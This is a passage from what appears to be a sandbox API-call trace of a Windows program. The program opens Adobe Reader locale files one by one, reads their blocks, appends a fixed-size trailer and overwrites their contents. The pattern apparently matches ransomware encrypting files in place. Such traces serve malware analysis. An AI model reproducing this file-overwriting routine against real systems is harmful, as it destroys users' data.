hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x5e00 [0082.054] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0082.060] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.060] ReleaseMutex (hMutex=0x168) returned 1 [0082.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.POL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0082.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.POL", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.POL", lpUsedDefaultChar=0x0) returned 10 [0082.060] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0082.100] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4e00 [0082.100] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0082.110] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4e00 [0082.111] WriteFile (in: hFile=0x1fc, lpBuffer=0x25aa078*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25aa078*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.111] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0082.112] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.112] CloseHandle (hObject=0x1fc) returned 1 [0082.112] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Acroform.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\acroform.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0084.243] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0084.243] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x69400 [0084.243] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0084.243] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.244] ReleaseMutex (hMutex=0x168) returned 1 [0084.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.PTB", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.PTB", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.PTB", lpUsedDefaultChar=0x0) returned 12 [0084.244] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0084.327] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x68400 [0084.327] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0084.369] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x68400 [0084.369] WriteFile (in: hFile=0x204, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.369] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0084.369] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0084.370] CloseHandle (hObject=0x204) returned 1 [0084.371] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\EScript.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\escript.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0084.372] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0084.372] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xa000 [0084.372] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0084.372] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.372] ReleaseMutex (hMutex=0x168) returned 1 [0084.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.PTB", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0084.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.PTB", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.PTB", lpUsedDefaultChar=0x0) returned 11 [0084.373] ReadFile (in: hFile=0x204, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0084.385] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x9000 [0084.385] ReadFile (in: hFile=0x204, lpBuffer=0x2696e18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2696e18*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0084.418] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x9000 [0084.418] WriteFile (in: hFile=0x204, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.419] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0084.419] WriteFile (in: hFile=0x204, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0084.419] CloseHandle (hObject=0x204) returned 1 [0084.419] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\reflow.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\reflow.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0084.420] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0084.420] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1200 [0084.420] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0084.420] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.420] ReleaseMutex (hMutex=0x168) returned 1 [0084.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.PTB", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0084.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.PTB", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.PTB", lpUsedDefaultChar=0x0) returned 10 [0084.420] ReadFile (in: hFile=0x204, lpBuffer=0x2665868, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x2fdf2bc*=0x1200, lpOverlapped=0x0) returned 1 [0084.432] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0084.432] WriteFile (in: hFile=0x204, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x2fdf2d0*=0x1788, lpOverlapped=0x0) returned 1 [0084.432] CloseHandle (hObject=0x204) returned 1 [0084.433] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Weblink.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\weblink.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0084.433] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0084.433] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6e00 [0084.433] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0084.433] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.433] ReleaseMutex (hMutex=0x168) returned 1 [0084.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.PTB", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0084.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.PTB", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.PTB", lpUsedDefaultChar=0x0) returned 11 [0084.434] ReadFile (in: hFile=0x204, lpBuffer=0x2665868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0084.448] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5e00 [0084.448] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0084.455] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5e00 [0084.455] WriteFile (in: hFile=0x204, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.456] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0084.457] WriteFile (in: hFile=0x204, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0084.457] CloseHandle (hObject=0x204) returned 1 [0084.457] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\DVA.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\dva.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0084.458] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0084.458] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4800 [0084.458] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0084.458] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.458] ReleaseMutex (hMutex=0x168) returned 1 [0084.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.RUM", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0084.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.RUM", cchWideChar=7, lpMultiByteStr=0x1f7aa14, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.RUM", lpUsedDefaultChar=0x0) returned 7 [0084.458] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0084.480] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3800 [0084.480] ReadFile (in: hFile=0x204, lpBuffer=0x1ea7eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7eb8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0084.491] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3800 [0084.491] WriteFile (in: hFile=0x204, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.491] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0084.491] WriteFile (in: hFile=0x204, lpBuffer=0x1ea7eb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7eb8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0084.491] CloseHandle (hObject=0x204) returned 1 [0084.492] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\RdLang32.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\rdlang32.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0084.492] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0084.493] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x154600 [0084.493] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0084.493] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.493] ReleaseMutex (hMutex=0x168) returned 1 [0084.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.RUM", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.RUM", cchWideChar=12, lpMultiByteStr=0x1f7356c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.RUM", lpUsedDefaultChar=0x0) returned 12 [0084.493] ReadFile (in: hFile=0x204, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0084.511] ReadFile (in: hFile=0x204, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0084.514] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x153600 [0084.514] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0084.519] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x153600 [0084.520] WriteFile (in: hFile=0x204, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.520] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0084.521] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0084.521] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0084.521] CloseHandle (hObject=0x204) returned 1 [0084.522] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Spelling.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\spelling.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0084.522] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0084.522] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2a00 [0084.523] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0084.523] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.523] ReleaseMutex (hMutex=0x168) returned 1 [0084.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.RUM", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.RUM", cchWideChar=12, lpMultiByteStr=0x1f7360c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.RUM", lpUsedDefaultChar=0x0) returned 12 [0084.523] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.081] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1a00 [0085.081] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.093] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1a00 [0085.093] WriteFile (in: hFile=0x204, lpBuffer=0x2866a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.093] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0085.093] WriteFile (in: hFile=0x204, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.094] CloseHandle (hObject=0x204) returned 1 [0085.094] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 